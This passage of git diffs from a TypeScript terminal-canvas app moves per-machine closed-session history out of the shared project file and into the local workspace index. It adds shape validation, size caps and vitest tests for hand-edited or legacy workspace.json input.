-            )[0]
-          }))
-        }
-      : {}),
     ...(base.cwd ? { cwd: base.cwd } : {}),
     ...(base.ssh ? { ssh: base.ssh } : {}),
     ...(base.closed ? { closed: true } : {}),
@@ -432,7 +431,10 @@ export function fileToProject(
     ...(base.capabilityAck ? { capabilityAck: base.capabilityAck } : {}),
     // Machine-local, from the index entry ONLY: a file field named `breadcrumbs` is a forgery
     // attempt (the shared file cannot carry this machine's navigation history) and is never read.
-    ...(base.breadcrumbs?.length ? { breadcrumbs: base.breadcrumbs } : {})
+    ...(base.breadcrumbs?.length ? { breadcrumbs: base.breadcrumbs } : {}),
+    // Machine-local, from the index entry ONLY, same rule as `breadcrumbs`: a file field named
+    // `closedSessions` is never read here — the shared file cannot carry this machine's trash can.
+    ...(base.closedSessions?.length ? { closedSessions: base.closedSessions } : {})
   }
 }
 
@@ -526,7 +528,13 @@ export function splitWorkspace(
       // The clone-notice acknowledgment rides the machine-local entry, never the shared file
       // (projectToFile does not emit it — pinned by project-capability-consent.test.ts).
       ...(p.capabilityAck ? { capabilityAck: p.capabilityAck } : {}),
-      ...(p.breadcrumbs?.length ? { breadcrumbs: p.breadcrumbs } : {})
+      ...(p.breadcrumbs?.length ? { breadcrumbs: p.breadcrumbs } : {}),
+      // Same rule: whose trash can holds what is machine-local, capped on the way OUT as well as
+      // in (see CLOSED_SESSIONS_CAP) — an in-memory list inflated some other way must not be
+      // written back uncapped.
+      ...(p.closedSessions?.length
+        ? { closedSessions: p.closedSessions.slice(0, CLOSED_SESSIONS_CAP) }
+        : {})
     }
     if (p.unavailable) {
       // Placeholder (folder missing / server unreachable at load): its nodes:[] is not real

--- a/src/core/workspace-store.closed-history.test.ts
+++ b/src/core/workspace-store.closed-history.test.ts
@@ -5,6 +5,7 @@ import path from 'path'
 import { initPlatform, resetPlatformForTests } from './platform'
 import { fakePlatform } from './platform-fake'
 import { WorkspaceStore } from './workspace-store'
+import { CLOSED_SESSIONS_CAP } from '../shared/types'
 import type { Project, Workspace } from '../shared/types'
 
 let userData: string
@@ -51,5 +52,92 @@ describe('closedAt round trip (machine-local index)', () => {
     await store.save(ws([project({ cwd: projRoot })]))
     const index = JSON.parse(await fs.readFile(path.join(userData, 'workspace.json'), 'utf-8'))
     expect(index.entries[0].closedAt).toBeUndefined()
+  })
+})
+
+/**
+ * An INLINE (cwd-less) project is stored verbatim in workspace.json and never passes through
+ * `fileToProject`, so it bypasses every guard that lives there. The branch already re-applies
+ * `validKanban` and `sanitizeNodeTriggers` for exactly this reason ("workspace.json is
+ * hand-editable input too") — `closedSessions` owes the same, or a malformed value reaches
+ * `mergeClosedHistory`, which iterates it (a non-array throws and takes the sidebar render down)
+ * and hands each node to React Flow.
+ */
+describe('inline (cwd-less) projects sanitize closedSessions on load', () => {
+  const writeIndex = async (entries: unknown[]): Promise<void> => {
+    await fs.writeFile(
+      path.join(userData, 'workspace.json'),
+      JSON.stringify({ version: 3, activeProjectId: 'p1', entries }),
+      'utf-8'
+    )
+  }
+  const inline = (closedSessions: unknown) => [
+    {
+      id: 'p1',
+      name: 'foo',
+      color: '#7aa2f7',
+      project: {
+        id: 'p1', name: 'foo', color: '#7aa2f7',
+        viewport: { x: 0, y: 0, zoom: 1 }, nodes: [],
+        closedSessions
+      }
+    }
+  ]
+
+  it('drops a non-array closedSessions rather than letting it reach the sidebar', async () => {
+    await writeIndex(inline({ not: 'an array' }))
+    const loaded = await new WorkspaceStore().load()
+    expect(loaded.projects[0].closedSessions).toBeUndefined()
+  })
+
+  it('drops entries with no position data (the recreate-time crash shape)', async () => {
+    await writeIndex(
+      inline([
+        {
+          id: 'e1', closedAt: 1,
+          node: { id: 'n1', kind: 'terminal', title: 't', color: '#fff', group: null }
+        }
+      ])
+    )
+    const loaded = await new WorkspaceStore().load()
+    expect(loaded.projects[0].closedSessions).toBeUndefined()
+  })
+
+  it('keeps a well-formed entry but strips a trigger spec off its node, same as live nodes', async () => {
+    await writeIndex(
+      inline([
+        {
+          id: 'e1', closedAt: 1,
+          absolutePosition: { x: 0, y: 0 },
+          node: {
+            id: 'n1', kind: 'terminal', position: { x: 0, y: 0 },
+            size: { width: 1, height: 1 }, title: 't', color: '#fff', group: null,
+            // A spec on a NON-trigger node — sanitizeNodeTriggers drops it outright.
+            trigger: { kind: 'cron', expr: '* * * * *' }
+          }
+        }
+      ])
+    )
+    const loaded = await new WorkspaceStore().load()
+    expect(loaded.projects[0].closedSessions).toHaveLength(1)
+    expect(loaded.projects[0].closedSessions?.[0].node.trigger).toBeUndefined()
+    expect(loaded.projects[0].closedSessions?.[0].node.title).toBe('t')
+  })
+
+  it('caps an oversized inline history', async () => {
+    await writeIndex(
+      inline(
+        Array.from({ length: CLOSED_SESSIONS_CAP + 5 }, (_, i) => ({
+          id: `e${i}`, closedAt: i,
+          absolutePosition: { x: 0, y: 0 },
+          node: {
+            id: `n${i}`, kind: 'terminal', position: { x: 0, y: 0 },
+            size: { width: 1, height: 1 }, title: 't', color: '#fff', group: null
+          }
+        }))
+      )
+    )
+    const loaded = await new WorkspaceStore().load()
+    expect(loaded.projects[0].closedSessions).toHaveLength(CLOSED_SESSIONS_CAP)
   })
 })

--- a/src/core/workspace-store.closed-history.test.ts
+++ b/src/core/workspace-store.closed-history.test.ts
@@ -6,7 +6,7 @@ import { initPlatform, resetPlatformForTests } from './platform'
 import { fakePlatform } from './platform-fake'
 import { WorkspaceStore } from './workspace-store'
 import { CLOSED_SESSIONS_CAP } from '../shared/types'
-import type { Project, Workspace } from '../shared/types'
+import type { ClosedSessionEntry, Project, Workspace } from '../shared/types'
 
 let userData: string
 let projRoot: string
@@ -28,6 +28,52 @@ afterEach(async () => {
   resetPlatformForTests()
   await fs.rm(userData, { recursive: true, force: true })
   await fs.rm(projRoot, { recursive: true, force: true })
+})
+
+/**
+ * A pre-v3 (v2) workspace.json skips loadV3 entirely — `migrateLegacy` assembles it in memory and
+ * the first save() is what actually migrates it to v3. Without its OWN sanitize pass, a malformed
+ * `closedSessions` on a hand-edited legacy file reaches `mergeClosedHistory` (a `for...of` over a
+ * non-array throws) on the very FIRST load, before any save ever runs.
+ */
+describe('a legacy (v2) workspace.json sanitizes closedSessions on migration', () => {
+  it('drops a malformed closedSessions rather than crashing the sidebar render', async () => {
+    await fs.writeFile(
+      path.join(userData, 'workspace.json'),
+      JSON.stringify({
+        version: 2,
+        activeProjectId: 'p1',
+        projects: [{
+          id: 'p1', name: 'foo', color: '#7aa2f7', viewport: { x: 0, y: 0, zoom: 1 }, nodes: [],
+          closedSessions: { not: 'an array' }
+        }]
+      }),
+      'utf-8'
+    )
+    const loaded = await new WorkspaceStore().load()
+    expect(loaded.projects[0].closedSessions).toBeUndefined()
+  })
+
+  it('keeps a well-formed legacy closedSessions entry', async () => {
+    await fs.writeFile(
+      path.join(userData, 'workspace.json'),
+      JSON.stringify({
+        version: 2,
+        activeProjectId: 'p1',
+        projects: [{
+          id: 'p1', name: 'foo', color: '#7aa2f7', viewport: { x: 0, y: 0, zoom: 1 }, nodes: [],
+          closedSessions: [{
+            id: 'e1', closedAt: 1, absolutePosition: { x: 0, y: 0 },
+            node: { id: 'n1', kind: 'terminal', position: { x: 0, y: 0 }, size: { width: 1, height: 1 }, title: 't', color: '#fff', group: null }
+          }]
+        }]
+      }),
+      'utf-8'
+    )
+    const loaded = await new WorkspaceStore().load()
+    expect(loaded.projects[0].closedSessions).toHaveLength(1)
+    expect(loaded.projects[0].closedSessions?.[0].id).toBe('e1')
+  })
 })
 
 describe('closedAt round trip (machine-local index)', () => {
@@ -52,6 +98,73 @@ describe('closedAt round trip (machine-local index)', () => {
     await store.save(ws([project({ cwd: projRoot })]))
     const index = JSON.parse(await fs.readFile(path.join(userData, 'workspace.json'), 'utf-8'))
     expect(index.entries[0].closedAt).toBeUndefined()
+  })
+})
+
+/**
+ * The maintainer's own storage-move requirement (PR #510 review): closed-session history is a
+ * per-machine fact, like `viewport`/`breadcrumbs` — a REF'D (cwd) project's history must live in
+ * the machine-local `workspace.json` index entry, never in the git-shared `.nodeterm/project.json`
+ * a teammate would also see. This is the round trip nothing else exercises end-to-end: every other
+ * test covers one layer (`projectToFile`/`fileToProject` in isolation, or the inline-project path,
+ * which is ALREADY machine-local by construction and so proves nothing about this move).
+ */
+describe('a ref\'d project\'s closedSessions rides the machine-local index, never the shared file', () => {
+  const entry = (id: string, closedAt: number): ClosedSessionEntry => ({
+    id, closedAt,
+    node: { id: 'term-1', kind: 'terminal', position: { x: 0, y: 0 }, size: { width: 1, height: 1 }, title: 't', color: '#fff', group: null },
+    absolutePosition: { x: 0, y: 0 }
+  })
+
+  it('lands in workspace.json but never in .nodeterm/project.json, and survives a reload', async () => {
+    const store = new WorkspaceStore()
+    await store.save(ws([project({ cwd: projRoot, closedSessions: [entry('e1', 1), entry('e2', 2)] })]))
+
+    const index = JSON.parse(await fs.readFile(path.join(userData, 'workspace.json'), 'utf-8'))
+    expect(index.entries[0].closedSessions?.map((e: { id: string }) => e.id)).toEqual(['e1', 'e2'])
+
+    const file = JSON.parse(await fs.readFile(path.join(projRoot, '.nodeterm/project.json'), 'utf-8'))
+    expect(file.closedSessions).toBeUndefined()
+    expect(JSON.stringify(file)).not.toContain('closedSessions')
+
+    // A fresh store instance, so this is a genuine reload off disk, not the same in-memory index.
+    const loaded = await new WorkspaceStore().load()
+    expect(loaded.projects[0].closedSessions?.map((e) => e.id)).toEqual(['e1', 'e2'])
+  })
+
+  it('survives an unavailable window (folder briefly unreadable) via the old-entry restore', async () => {
+    const store = new WorkspaceStore()
+    await store.save(ws([project({ cwd: projRoot, closedSessions: [entry('e1', 1)] })]))
+
+    // The folder becomes unreadable — save() must not let splitWorkspace's header-only placeholder
+    // erase the machine-local history it can't currently see.
+    await store.save(ws([project({ cwd: projRoot, unavailable: true })]))
+    const index = JSON.parse(await fs.readFile(path.join(userData, 'workspace.json'), 'utf-8'))
+    expect(index.entries[0].closedSessions?.map((e: { id: string }) => e.id)).toEqual(['e1'])
+  })
+
+  it('caps and re-sanitizes a hand-edited oversized/hostile index entry on load', async () => {
+    await fs.writeFile(
+      path.join(userData, 'workspace.json'),
+      JSON.stringify({
+        version: 3,
+        activeProjectId: 'p1',
+        entries: [{
+          id: 'p1', name: 'foo', color: '#7aa2f7', cwd: projRoot,
+          closedSessions: Array.from({ length: CLOSED_SESSIONS_CAP + 5 }, (_, i) => entry(`e${i}`, i))
+        }]
+      }),
+      'utf-8'
+    )
+    await fs.mkdir(path.join(projRoot, '.nodeterm'), { recursive: true })
+    await fs.writeFile(
+      path.join(projRoot, '.nodeterm/project.json'),
+      JSON.stringify({ version: 1, rev: 1, savedAt: 'now', name: 'foo', color: '#7aa2f7', nodes: [] }),
+      'utf-8'
+    )
+    const loaded = await new WorkspaceStore().load()
+    expect(loaded.projects[0].closedSessions).toHaveLength(CLOSED_SESSIONS_CAP)
+    expect(loaded.projects[0].closedSessions?.[0].id).toBe('e0')
   })
 })
 

--- a/src/core/workspace-store.closed-history.test.ts
+++ b/src/core/workspace-store.closed-history.test.ts
@@ -1,0 +1,55 @@
+import { describe, it, expect, beforeEach, afterEach } from 'vitest'
+import { promises as fs } from 'fs'
+import os from 'os'
+import path from 'path'
+import { initPlatform, resetPlatformForTests } from './platform'
+import { fakePlatform } from './platform-fake'
+import { WorkspaceStore } from './workspace-store'
+import type { Project, Workspace } from '../shared/types'
+
+let userData: string
+let projRoot: string
+
+const project = (over: Partial<Project> = {}): Project => ({
+  id: 'p1', name: 'foo', color: '#7aa2f7', viewport: { x: 0, y: 0, zoom: 1 },
+  nodes: [{ id: 'term-1', kind: 'terminal', position: { x: 0, y: 0 }, size: { width: 1, height: 1 }, title: 't', color: '#fff', group: null }],
+  ...over
+})
+const ws = (projects: Project[], active = projects[0]?.id ?? ''): Workspace =>
+  ({ version: 2, activeProjectId: active, projects })
+
+beforeEach(async () => {
+  userData = await fs.mkdtemp(path.join(os.tmpdir(), 'nt-ws-'))
+  projRoot = await fs.mkdtemp(path.join(os.tmpdir(), 'nt-proj-'))
+  initPlatform(fakePlatform({ userDataDir: userData }))
+})
+afterEach(async () => {
+  resetPlatformForTests()
+  await fs.rm(userData, { recursive: true, force: true })
+  await fs.rm(projRoot, { recursive: true, force: true })
+})
+
+describe('closedAt round trip (machine-local index)', () => {
+  it('persists closedAt on the index entry and never on the shared project file', async () => {
+    const store = new WorkspaceStore()
+    await store.save(ws([project({ cwd: projRoot, closed: true, closedAt: 12345 })]))
+
+    const index = JSON.parse(await fs.readFile(path.join(userData, 'workspace.json'), 'utf-8'))
+    expect(index.entries[0].closed).toBe(true)
+    expect(index.entries[0].closedAt).toBe(12345)
+
+    const file = JSON.parse(await fs.readFile(path.join(projRoot, '.nodeterm/project.json'), 'utf-8'))
+    expect(file.closedAt).toBeUndefined()
+
+    const loaded = await store.load()
+    expect(loaded.projects[0].closed).toBe(true)
+    expect(loaded.projects[0].closedAt).toBe(12345)
+  })
+
+  it('omits closedAt from the index when the project was never closed', async () => {
+    const store = new WorkspaceStore()
+    await store.save(ws([project({ cwd: projRoot })]))
+    const index = JSON.parse(await fs.readFile(path.join(userData, 'workspace.json'), 'utf-8'))
+    expect(index.entries[0].closedAt).toBeUndefined()
+  })
+})

--- a/src/core/workspace-store.ts
+++ b/src/core/workspace-store.ts
@@ -284,6 +284,7 @@ export class WorkspaceStore {
               id: e.id,
               cwd: e.cwd,
               closed: e.closed,
+              closedAt: e.closedAt,
               viewport: e.viewport,
               defaultAccountId: e.defaultAccountId,
               breadcrumbs: e.breadcrumbs,
@@ -304,6 +305,7 @@ export class WorkspaceStore {
               id: e.id,
               ssh: e.ssh,
               closed: e.closed,
+              closedAt: e.closedAt,
               viewport: e.viewport,
               defaultAccountId: e.defaultAccountId,
               breadcrumbs: e.breadcrumbs,
@@ -989,6 +991,7 @@ export class WorkspaceStore {
       id: e.id,
       cwd: e.cwd,
       closed: e.closed,
+      closedAt: e.closedAt,
       viewport: e.viewport,
       defaultAccountId: e.defaultAccountId,
       breadcrumbs: e.breadcrumbs,
@@ -1307,6 +1310,7 @@ export class WorkspaceStore {
           id: e.id,
           cwd: e.cwd,
           closed: e.closed,
+          closedAt: e.closedAt,
           viewport: e.viewport,
           defaultAccountId: e.defaultAccountId,
           breadcrumbs: e.breadcrumbs,
@@ -1363,6 +1367,7 @@ export class WorkspaceStore {
             id: e.id,
             cwd: e.cwd,
             closed: e.closed,
+            closedAt: e.closedAt,
             viewport: e.viewport,
             defaultAccountId: e.defaultAccountId,
             breadcrumbs: e.breadcrumbs,
@@ -1429,7 +1434,7 @@ export class WorkspaceStore {
     }
     this.revs.set(e.id, e.cache.rev)
     return fileToProject(e.cache, {
-      id: e.id, ssh: e.ssh, closed: e.closed,
+      id: e.id, ssh: e.ssh, closed: e.closed, closedAt: e.closedAt,
       viewport: e.viewport, defaultAccountId: e.defaultAccountId, breadcrumbs: e.breadcrumbs,
       capabilityAck: e.capabilityAck, localExec: e.localExec
     })
@@ -1536,7 +1541,7 @@ export class WorkspaceStore {
       if (owed) this.unmirrored.add(e.id)
       else this.unmirrored.delete(e.id) // pure adopt: the server copy IS the truth now — nothing owed
       return fileToProject(adopted, {
-        id: e.id, ssh: e.ssh, closed: e.closed,
+        id: e.id, ssh: e.ssh, closed: e.closed, closedAt: e.closedAt,
         viewport: e.viewport, defaultAccountId: e.defaultAccountId, breadcrumbs: e.breadcrumbs,
         capabilityAck: e.capabilityAck, localExec: e.localExec
       })
@@ -1551,7 +1556,7 @@ export class WorkspaceStore {
         this.revs.set(e.id, e.cache.rev)
         this.unmirrored.add(e.id) // the merged set must land on the server
         merged = fileToProject(e.cache, {
-          id: e.id, ssh: e.ssh, closed: e.closed,
+          id: e.id, ssh: e.ssh, closed: e.closed, closedAt: e.closedAt,
           viewport: e.viewport, defaultAccountId: e.defaultAccountId, breadcrumbs: e.breadcrumbs,
           capabilityAck: e.capabilityAck, localExec: e.localExec
         })
@@ -1587,12 +1592,13 @@ function nodesMissingFrom(base: CanvasNodeState[], from: CanvasNodeState[]): Can
 }
 
 /** A labeled grey placeholder for a ref whose file can't be read right now. */
-function unavailableProject(e: { id: string; name: string; color: string; closed?: boolean; cwd?: string; ssh?: Project['ssh'] }): Project {
+function unavailableProject(e: { id: string; name: string; color: string; closed?: boolean; closedAt?: number; cwd?: string; ssh?: Project['ssh'] }): Project {
   return {
     id: e.id, name: e.name, color: e.color,
     viewport: { x: 0, y: 0, zoom: 1 }, nodes: [],
     ...(e.cwd ? { cwd: e.cwd } : {}), ...(e.ssh ? { ssh: e.ssh } : {}),
     ...(e.closed ? { closed: true } : {}),
+    ...(e.closedAt ? { closedAt: e.closedAt } : {}),
     unavailable: true
   }
 }

--- a/src/core/workspace-store.ts
+++ b/src/core/workspace-store.ts
@@ -5,12 +5,13 @@ import { renameAtomic, writeFileAtomic } from './fs-atomic'
 import { IPC } from '../shared/ipc'
 import { platform } from './platform'
 import {
-  CLOSED_SESSIONS_CAP, DEFAULT_PROJECT_ID, EMPTY_WORKSPACE,
+  DEFAULT_PROJECT_ID, EMPTY_WORKSPACE,
   type BridgeLink, type CanvasNodeState, type Project, type Workspace, type WorkspaceV1
 } from '../shared/types'
 import {
   PROJECT_DIR, PROJECT_FILE, fileToProject, projectToFile, resolveNodes, sameProjectContent,
-  sanitizeNodeTriggers, serializeProjectFile, splitWorkspace, validClosedSessions, validKanban,
+  sanitizeLoadedClosedSessions, sanitizeNodeTriggers, serializeProjectFile, splitWorkspace,
+  validKanban,
   type IndexEntryV3, type ProjectFileV1, type WorkspaceIndexV3
 } from './workspace-files'
 import { readProjectSettingsFile, writeProjectSettingsFile } from './project-settings-files'
@@ -256,7 +257,14 @@ export class WorkspaceStore {
   }
 
   private async loadV3(index: WorkspaceIndexV3, sideline: boolean): Promise<Workspace> {
-    for (const entry of index.entries) entry.localApprovalId ||= randomUUID()
+    for (const entry of index.entries) {
+      entry.localApprovalId ||= randomUUID()
+      // Same "workspace.json is hand-editable input too" treatment as the inline-project branch
+      // below, for a REF'd project's own closed-session history: validate shape, cap, and
+      // re-normalize each snapshot's trigger spec. Sanitized ONCE here so every downstream reader
+      // of `e.closedSessions` (fileToProject, readLocalRef, the ssh reconcile paths) can trust it.
+      entry.closedSessions = sanitizeLoadedClosedSessions(entry.closedSessions)
+    }
     this.index = index
     const built: LoadedEntry[] = []
     for (const e of index.entries) {
@@ -267,16 +275,11 @@ export class WorkspaceStore {
         // `rest` drops BOTH guarded fields; each is added back below only if it passes its guard.
         const { kanban, closedSessions, ...rest } = e.project
         const base = validKanban(kanban) ? { ...rest, kanban } : rest
-        // Same treatment for `closedSessions`, and for the same reason: a malformed value here
-        // reaches `mergeClosedHistory`, which iterates it (a non-array throws and takes the whole
-        // sidebar render down) and hands each entry's node to React Flow. Dropped when it fails
-        // the shape rule, capped like every other path, and each surviving node gets the same
-        // trigger normalization `nodes` gets.
-        const history = validClosedSessions(closedSessions)
-          ? closedSessions
-              .slice(0, CLOSED_SESSIONS_CAP)
-              .map((c) => ({ ...c, node: sanitizeNodeTriggers([c.node])[0] }))
-          : undefined
+        // Same treatment for `closedSessions` as the ref'd-project entries above, and for the
+        // same reason: a malformed value here reaches `mergeClosedHistory`, which iterates it (a
+        // non-array throws and takes the whole sidebar render down) and hands each entry's node
+        // to React Flow.
+        const history = sanitizeLoadedClosedSessions(closedSessions)
         built.push({
           entry: e,
           project: {
@@ -306,6 +309,7 @@ export class WorkspaceStore {
               viewport: e.viewport,
               defaultAccountId: e.defaultAccountId,
               breadcrumbs: e.breadcrumbs,
+              closedSessions: e.closedSessions,
               capabilityAck: e.capabilityAck,
               localExec: this.execOverlay(e, p)
             })
@@ -327,6 +331,7 @@ export class WorkspaceStore {
               viewport: e.viewport,
               defaultAccountId: e.defaultAccountId,
               breadcrumbs: e.breadcrumbs,
+              closedSessions: e.closedSessions,
               capabilityAck: e.capabilityAck,
               localExec: this.execOverlay(e, e.cache)
             })
@@ -856,6 +861,10 @@ export class WorkspaceStore {
         if (old?.viewport) e.viewport = old.viewport
         if (old?.defaultAccountId) e.defaultAccountId = old.defaultAccountId
         if (old?.breadcrumbs) e.breadcrumbs = old.breadcrumbs
+        // Same rule: a placeholder's project carries no closedSessions (it has no nodes to have
+        // deleted), so without this an unavailable window would silently forget the user's trash
+        // can the moment splitWorkspace rebuilds the index.
+        if (old?.closedSessions) e.closedSessions = old.closedSessions
         // The clone-notice acknowledgment must also survive an unavailable window: forgetting it
         // would re-raise a notice the user already answered the moment the folder remounts.
         if (old?.capabilityAck) e.capabilityAck = old.capabilityAck
@@ -1013,6 +1022,7 @@ export class WorkspaceStore {
       viewport: e.viewport,
       defaultAccountId: e.defaultAccountId,
       breadcrumbs: e.breadcrumbs,
+      closedSessions: e.closedSessions,
       capabilityAck: e.capabilityAck,
       localExec: e.localExec
     })
@@ -1332,6 +1342,7 @@ export class WorkspaceStore {
           viewport: e.viewport,
           defaultAccountId: e.defaultAccountId,
           breadcrumbs: e.breadcrumbs,
+          closedSessions: e.closedSessions,
           capabilityAck: e.capabilityAck,
           localExec: e.localExec
         })
@@ -1389,6 +1400,7 @@ export class WorkspaceStore {
             viewport: e.viewport,
             defaultAccountId: e.defaultAccountId,
             breadcrumbs: e.breadcrumbs,
+            closedSessions: e.closedSessions,
             capabilityAck: e.capabilityAck,
             localExec: e.localExec
           })
@@ -1454,6 +1466,7 @@ export class WorkspaceStore {
     return fileToProject(e.cache, {
       id: e.id, ssh: e.ssh, closed: e.closed, closedAt: e.closedAt,
       viewport: e.viewport, defaultAccountId: e.defaultAccountId, breadcrumbs: e.breadcrumbs,
+      closedSessions: e.closedSessions,
       capabilityAck: e.capabilityAck, localExec: e.localExec
     })
   }
@@ -1561,6 +1574,7 @@ export class WorkspaceStore {
       return fileToProject(adopted, {
         id: e.id, ssh: e.ssh, closed: e.closed, closedAt: e.closedAt,
         viewport: e.viewport, defaultAccountId: e.defaultAccountId, breadcrumbs: e.breadcrumbs,
+        closedSessions: e.closedSessions,
         capabilityAck: e.capabilityAck, localExec: e.localExec
       })
     }
@@ -1576,6 +1590,7 @@ export class WorkspaceStore {
         merged = fileToProject(e.cache, {
           id: e.id, ssh: e.ssh, closed: e.closed, closedAt: e.closedAt,
           viewport: e.viewport, defaultAccountId: e.defaultAccountId, breadcrumbs: e.breadcrumbs,
+          closedSessions: e.closedSessions,
           capabilityAck: e.capabilityAck, localExec: e.localExec
         })
       }
@@ -1628,7 +1643,17 @@ function migrateLegacy(parsed: unknown): Workspace {
     const active = ws.projects.some((p) => p.id === ws.activeProjectId)
       ? (ws.activeProjectId as string)
       : (ws.projects[0]?.id ?? '')
-    return { version: 2, activeProjectId: active, projects: ws.projects }
+    // A pre-v3 workspace.json is hand-editable input too, same as an inline v3 entry — and this
+    // path skips loadV3 entirely (the first save() is what actually migrates it), so without this
+    // a malformed `closedSessions` reaches `mergeClosedHistory`'s `for...of` before that save ever
+    // runs and takes the sidebar render down on the very first load.
+    const projects = ws.projects.map((p) => {
+      const history = sanitizeLoadedClosedSessions(p.closedSessions)
+      if (history === p.closedSessions) return p
+      const { closedSessions: _dropped, ...rest } = p
+      return history ? { ...rest, closedSessions: history } : rest
+    })
+    return { version: 2, activeProjectId: active, projects }
   }
   if (ws?.version === 1 && Array.isArray(ws.nodes)) {
     return {

--- a/src/core/workspace-store.ts
+++ b/src/core/workspace-store.ts
@@ -5,12 +5,12 @@ import { renameAtomic, writeFileAtomic } from './fs-atomic'
 import { IPC } from '../shared/ipc'
 import { platform } from './platform'
 import {
-  DEFAULT_PROJECT_ID, EMPTY_WORKSPACE,
+  CLOSED_SESSIONS_CAP, DEFAULT_PROJECT_ID, EMPTY_WORKSPACE,
   type BridgeLink, type CanvasNodeState, type Project, type Workspace, type WorkspaceV1
 } from '../shared/types'
 import {
   PROJECT_DIR, PROJECT_FILE, fileToProject, projectToFile, resolveNodes, sameProjectContent,
-  sanitizeNodeTriggers, serializeProjectFile, splitWorkspace, validKanban,
+  sanitizeNodeTriggers, serializeProjectFile, splitWorkspace, validClosedSessions, validKanban,
   type IndexEntryV3, type ProjectFileV1, type WorkspaceIndexV3
 } from './workspace-files'
 import { readProjectSettingsFile, writeProjectSettingsFile } from './project-settings-files'
@@ -264,9 +264,27 @@ export class WorkspaceStore {
         // Inline projects are stored verbatim in the index (no fileToProject pass), so apply the
         // same kanban shape guard here — a v1/hand-edited board would otherwise crash the render —
         // and the same trigger shape rule (workspace.json is hand-editable input too).
-        const { kanban, ...rest } = e.project
-        const base = validKanban(kanban) ? e.project : rest
-        built.push({ entry: e, project: { ...base, nodes: sanitizeNodeTriggers(base.nodes) } })
+        // `rest` drops BOTH guarded fields; each is added back below only if it passes its guard.
+        const { kanban, closedSessions, ...rest } = e.project
+        const base = validKanban(kanban) ? { ...rest, kanban } : rest
+        // Same treatment for `closedSessions`, and for the same reason: a malformed value here
+        // reaches `mergeClosedHistory`, which iterates it (a non-array throws and takes the whole
+        // sidebar render down) and hands each entry's node to React Flow. Dropped when it fails
+        // the shape rule, capped like every other path, and each surviving node gets the same
+        // trigger normalization `nodes` gets.
+        const history = validClosedSessions(closedSessions)
+          ? closedSessions
+              .slice(0, CLOSED_SESSIONS_CAP)
+              .map((c) => ({ ...c, node: sanitizeNodeTriggers([c.node])[0] }))
+          : undefined
+        built.push({
+          entry: e,
+          project: {
+            ...base,
+            nodes: sanitizeNodeTriggers(base.nodes),
+            ...(history ? { closedSessions: history } : {})
+          }
+        })
       } else if (e.cwd) {
         if (sideline) await sweepStaleTmp(projectFilePath(e.cwd))
         const read = await this.readProjectFile(e.cwd, sideline)

--- a/src/renderer/canvas/Canvas.tsx
+++ b/src/renderer/canvas/Canvas.tsx
@@ -4562,30 +4562,45 @@ export function Canvas() {
     (ids: string[], opts?: { record?: boolean }) => {
       const set = new Set(ids)
       if (opts?.record !== false) {
-        const snapshots = nodesRef.current
-          .filter((n) => set.has(n.id))
-          .map((n) => snapshotNode(n, nodesRef.current))
-          .filter((s): s is NonNullable<typeof s> => s !== null)
-        if (snapshots.length) {
-          useReopenHistory.getState().push({
-            kind: 'nodes',
-            projectId: useProjects.getState().activeProjectId ?? '',
-            closedAt: Date.now(),
-            nodes: snapshots
-          })
-        }
         const deletedAt = Date.now()
+        // Keyed by node id, not by array position: `closedEntries` and `snapshots` below each run
+        // their OWN independent filter over `nodesRef.current` (both via `snapshotNode`), and a
+        // node-id map is what lets the two stay correlated even if those filters ever drift apart,
+        // rather than relying on the two passes producing the same order.
+        const closedSessionIdByNode = new Map<string, string>()
         // `uuid()`, NOT crypto.randomUUID: the latter exists only in a SECURE context, so it is
         // undefined in the Server Edition served over plain HTTP on a LAN — and this call sits at
         // the TOP of deleteNodes, before transport.destroy/setNodes, so a throw here would make
         // Delete do nothing at all on that surface. See lib/uuid.ts (the same call already broke
         // "Add agent" once).
-        const closedEntries = buildClosedSessionEntries(set, nodesRef.current, deletedAt, uuid)
+        const closedEntries = buildClosedSessionEntries(set, nodesRef.current, deletedAt, (nodeId) => {
+          const id = uuid()
+          closedSessionIdByNode.set(nodeId, id)
+          return id
+        })
         if (closedEntries.length) {
           useProjects.getState().recordClosedSessions(
             useProjects.getState().activeProjectId ?? '',
             closedEntries
           )
+        }
+        // The two ledgers must agree on which node minted which persisted entry, so ⇧⌘T's restore
+        // can drop the persisted twin and the sidebar's reopen can drop this snapshot — see
+        // `ReopenNodeSnapshot.closedSessionId`.
+        const snapshots = nodesRef.current
+          .filter((n) => set.has(n.id))
+          .map((n) => {
+            const snap = snapshotNode(n, nodesRef.current)
+            return snap ? { ...snap, closedSessionId: closedSessionIdByNode.get(n.id) } : snap
+          })
+          .filter((s): s is NonNullable<typeof s> => s !== null)
+        if (snapshots.length) {
+          useReopenHistory.getState().push({
+            kind: 'nodes',
+            projectId: useProjects.getState().activeProjectId ?? '',
+            closedAt: deletedAt,
+            nodes: snapshots
+          })
         }
       }
       nodesRef.current.forEach((n) => {
@@ -6258,6 +6273,20 @@ export function Canvas() {
       const entry = useReopenHistory.getState().popNext()
       if (!entry) return false
 
+      // The persisted twin of this batch (the sidebar's "Recently closed" rows the SAME delete
+      // recorded) must be consumed too — whether this entry ends up restored or skipped as stale,
+      // the ⇧⌘T stack is done with it either way, and leaving the sidebar row behind would let a
+      // later click there restore a duplicate. `writeDisk` runs unconditionally because
+      // `entry.projectId` may not be the active project, whose autosave debounce wouldn't cover it.
+      if (entry.kind === 'nodes') {
+        for (const n of entry.nodes) {
+          if (n.closedSessionId) {
+            useProjects.getState().discardClosedSession(entry.projectId, n.closedSessionId)
+          }
+        }
+        void writeDisk()
+      }
+
       const { projects, activeProjectId } = useProjects.getState()
       const project = projects.find((p) => p.id === entry.projectId)
       const accounts = useSettings.getState().settings.claudeAccounts
@@ -6278,7 +6307,7 @@ export function Canvas() {
       if (plan.action === 'skip') continue
       return executeReopenPlan(plan)
     }
-  }, [executeReopenPlan])
+  }, [executeReopenPlan, writeDisk])
 
   /** Reopens ONE entry from a project's persisted `closedSessions` (the sidebar's "Recently
    *  closed" section) — the browsable counterpart to `Cmd+Shift+T`. Consumes the entry
@@ -6293,6 +6322,9 @@ export function Canvas() {
     (projectId: string, entryId: string): boolean => {
       const consumed = useProjects.getState().consumeClosedSession(projectId, entryId)
       if (!consumed) return false
+      // The ⇧⌘T-stack twin of this entry (if the SAME delete also pushed one) must go too, or a
+      // later Cmd+Shift+T could restore this same closed session a second time.
+      useReopenHistory.getState().dropByClosedSessionId(projectId, entryId)
       void writeDisk()
 
       const { projects, activeProjectId } = useProjects.getState()

--- a/src/renderer/canvas/Canvas.tsx
+++ b/src/renderer/canvas/Canvas.tsx
